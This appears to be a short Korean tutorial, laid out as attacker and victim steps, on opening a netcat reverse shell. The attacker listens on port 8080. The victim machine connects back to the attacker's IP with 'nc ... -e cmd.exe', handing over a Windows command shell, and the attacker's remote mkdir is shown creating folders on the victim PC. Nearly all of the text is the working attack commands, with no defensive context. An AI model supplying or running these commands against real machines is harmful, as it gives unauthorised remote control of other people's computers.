필요한 도구 - 공격자 (HOST) 희생자 (GUEST)
nc.exe
nc.exe
1. 공격자 pc에서 nc -l -p 8080
을 입력후 대기한다
그리고 희생자 pc에서 nc xxx.xxx.xxx.xxx. 8080 -e cmd.exe 를 입력한다
여기서 IP는 공격자의 IP를 입력한다
다시 공격자 pc로 와서 쉘을 확인하면
그림과 같이 접속되서 cmd 명령이 실행되어있음을 보여준다
희생자 pc에서 폴더생성도 가능하다
보시다시피 mkdir 로 폴더생성하면 희생자 pc 쪽에서 폴더가 생성됨을 볼수있다